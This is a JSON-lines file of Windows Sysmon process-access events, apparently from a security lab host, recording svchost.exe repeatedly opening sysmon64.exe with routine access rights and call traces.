{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1426,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.173\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.173","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1427,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.173\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.173","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1428,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.173\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.173","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1429,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.173\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.173","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1430,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.173\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.173","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1431,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.173\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.173","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1432,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.173\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.173","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1433,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.182\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.182","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
